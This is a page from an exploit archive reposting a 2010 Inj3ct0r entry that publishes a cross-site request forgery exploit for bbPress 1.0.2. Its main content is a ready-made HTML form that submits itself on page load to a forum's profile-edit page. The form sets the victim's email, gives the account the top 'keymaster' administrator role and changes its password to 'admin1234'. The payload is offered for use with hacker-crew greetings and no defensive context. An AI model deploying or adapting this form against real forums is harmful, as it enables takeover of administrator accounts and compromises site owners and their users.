Home / os / win7

bbPress v1.0.2 Cross-Site Request Forgery

Posted on 29 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>bbPress v1.0.2 Cross-Site Request Forgery</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
bbPress v1.0.2 Cross-Site Request Forgery
=========================================


: # Software : bbPress v 1.0.2 CSRF
: # site : www.bbpress.org
: # date : 29/6/2010
: # Author : saudi0hacker
: # Date : May 25, 2010
: # Type : CSRF
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com
 
 
&lt;html&gt;
&lt;body onload=\&quot;document.forms[\'Login\'].submit();\&quot;&gt;
&lt;form method=\&quot;post\&quot; name = \&quot;Login\&quot; action=\&quot;http://localhost/bb/profile.php?id=1&amp;tab=edit\&quot;&gt;
 
&lt;select type=\&quot;hidden\&quot; name=\&quot;display_name\&quot; id=\&quot;display_name\&quot;&gt;
&lt;option type=\&quot;hidden\&quot; id=\&quot;display_displayname\&quot; value=\&quot;admin\&quot;&gt;admin&lt;/option&gt;
&lt;input type=\&quot;hidden\&quot; name=\&quot;user_email\&quot; id=\&quot;user_email\&quot; value=\&quot;admin@sss.com\&quot; /&gt;
&lt;input id=\&quot;_wpnonce\&quot; name=\&quot;_wpnonce\&quot; value=\&quot;98dfb69b68\&quot; /&gt;&lt;input type=\&quot;hidden\&quot; name=\&quot;_wp_http_referer\&quot; value=\&quot;/bb/profile.php?id=1&amp;tab=edit\&quot; /&gt;
&lt;select type=\&quot;hidden\&quot; id=\&quot;admininfo_role\&quot; name=\&quot;role\&quot;&gt;
&lt;option value=\&quot;keymaster\&quot; selected=\&quot;selected\&quot;&gt;Key Master&lt;/option&gt;
&lt;input name=\&quot;pass1\&quot; type=\&quot;hidden\&quot; value= \&quot;admin1234\&quot; id=\&quot;pass1\&quot; autocomplete=\&quot;off\&quot; /&gt;
&lt;input name=\&quot;pass2\&quot; type=\&quot;hidden\&quot; value= \&quot;admin1234\&quot; id=\&quot;pass2\&quot; autocomplete=\&quot;off\&quot; /&gt;
&lt;input type=\&quot;submit\&quot; name=\&quot;Submit\&quot; value=\&quot;save\&quot; /&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :